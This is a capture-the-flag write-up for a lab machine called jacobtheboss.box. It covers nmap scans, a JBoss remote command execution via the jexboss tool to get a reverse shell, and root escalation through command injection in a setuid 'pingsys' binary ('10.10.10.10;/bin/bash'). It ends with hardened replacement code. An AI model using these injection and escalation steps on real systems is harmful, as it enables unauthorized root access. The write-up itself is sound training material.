Port scanning

Add jacobtheboss.box to the hosts file.

nmap --min-rate 10000 -p- jacobtheboss.box
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-12 01:27 UTC
Nmap scan report for jacobtheboss.box (10.10.58.130)
Host is up (0.0047s latency).
Not shown: 65515 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
1090/tcp open ff-fms
1098/tcp open rmiactivation
1099/tcp open rmiregistry
3306/tcp open mysql
3873/tcp open fagordnc
4444/tcp open krb524
4445/tcp open upnotifyp
4446/tcp open n1-fwp
4457/tcp open prRegister
4712/tcp open unknown
4713/tcp open pulseaudio
8009/tcp open ajp13
8080/tcp open http-proxy
8083/tcp open us-srv
25679/tcp open unknown
32837/tcp open unknown
33463/tcp open unknown
MAC Address: 02:F2:2C:23:BD:6F (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 3.46 seconds

nmap -sT -sV -sC -O -p22,80,3306,8009,8080 jacobtheboss.box
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-12 01:28 UTC
Nmap scan report for jacobtheboss.box (10.10.58.130)
Host is up (0.0012s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 82ca136ed963c05f4a23a5a5a5103c7f (RSA)
| 256 a46ed25d0d362e732f1d529ce58a7b04 (ECDSA)
|_ 256 6f54a65eba5badcc87eed3a8d5e0aa2a (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/7.3.20)
|_http-title: My first blog
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.3.20
3306/tcp open mysql MariaDB (unauthorized)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
| Supported methods: GET HEAD POST PUT DELETE TRACE OPTIONS
| Potentially risky methods: PUT DELETE TRACE
|_ See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Welcome to JBoss™
|_http-open-proxy: Proxy might be redirecting requests
| http-methods:
|_ Potentially risky methods: PUT DELETE TRACE
|_http-server-header: Apache-Coyote/1.1
MAC Address: 02:F2:2C:23:BD:6F (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.10 - 3.13
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds

Web

Port 80 serves a blog page with nothing of interest on it, so I turned to the JBoss instance on port 8080.

Went straight to https://github.com/joaomatosf/jexboss to get a reverse shell.

At first I used the Python script shipped with Kali, but it would not give me a reverse shell no matter what, which was frustrating. The RCE is

JBoss AS 3/4/5/6 - Remote Command Execution

Privilege escalation

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
-r-xr-sr-x. 1 root tty 15344 Jun 9 2014 /usr/bin/wall
-rwsr-xr-x. 1 root root 8536 Jul 30 2020 /usr/bin/pingsys

There is a pingsys binary, which does not look like a standard system executable, so I loaded it into IDA to decompile it.

int __fastcall main(int a1, char **a2, char **a3)
{
void *v3; // stack pointer
char **v5; // pointer to the stack buffer that receives the command string
int v6; // integer holding the argument count
char *s; // string pointer; the decompiler names the same buffer v5 above
__int64 v8; // long integer: buffer length minus one

// Copy the input arguments into local variables
v6 = a1;
v5 = a2;
v8 = dword_60104C - 1LL;

// Allocate enough stack space for the command buffer
v3 = alloca(16 * ((dword_60104C + 15LL) / 0x10uLL));

// Build the ping command as a string from the untrusted argument and store it in the buffer
snprintf((char *)&v5, dword_60104C, "ping -c 4 %s", a2[1]);

// Try to set the user ID to 0 (root); print an error if it fails
if (setuid(0) == -1)
printf("setUID ERROR");

// Run the constructed ping command through the shell
return system(s);
}

Since the argument is pasted into a shell command string unchanged, a second command can simply be chained onto it:

/usr/bin/pingsys '10.10.10.10;/bin/bash'
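The root cause is that pingsys formats an untrusted argument into a shell command line and hands it to system() as root. The following is an added example of how such a setuid wrapper should be written, not the code of the binary from the room: the argument is accepted only if it is an IP literal, and ping is started with execve() and a fixed argv, so no shell ever parses the input.

```c
/* Hardened counterpart to pingsys (example code, not the room's binary):
 * validate the argument as an IPv4/IPv6 literal and exec ping with a
 * fixed argv and environment, so a shell never sees the user's input. */
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Accept only an IPv4 or IPv6 literal. Hostnames, whitespace and shell
 * metacharacters such as ';' are rejected. Returns 1 if valid, else 0. */
int is_valid_host(const char *arg)
{
    unsigned char buf[16];
    if (arg == NULL || strlen(arg) > 45)        /* longest textual IPv6 */
        return 0;
    return inet_pton(AF_INET, arg, buf) == 1 ||
           inet_pton(AF_INET6, arg, buf) == 1;
}

/* Run "ping -c 4 <host>" via fork/execve. argv is passed as an array, so
 * the argument is a single token even if validation were ever bypassed.
 * Returns ping's exit status, or -1 on invalid input or exec failure. */
int run_ping(const char *host)
{
    if (!is_valid_host(host))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "/usr/bin/ping", "-c", "4", (char *)host, NULL };
        char *const envp[] = { "PATH=/usr/bin:/bin", NULL }; /* fixed environment */
        execve(argv[0], argv, envp);
        _exit(127);                              /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char **argv)
{
    if (argc != 2 || !is_valid_host(argv[1])) {
        fprintf(stderr, "usage: pingsys <ipv4|ipv6 address>\n");
        return 2;
    }
    return run_ping(argv[1]);
}
```

With this version the injected argument from the writeup is rejected before anything is executed, and the binary no longer needs setuid(0) at all because ping carries its own capability.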

Closing notes

JBoss again, and still a fairly easy room.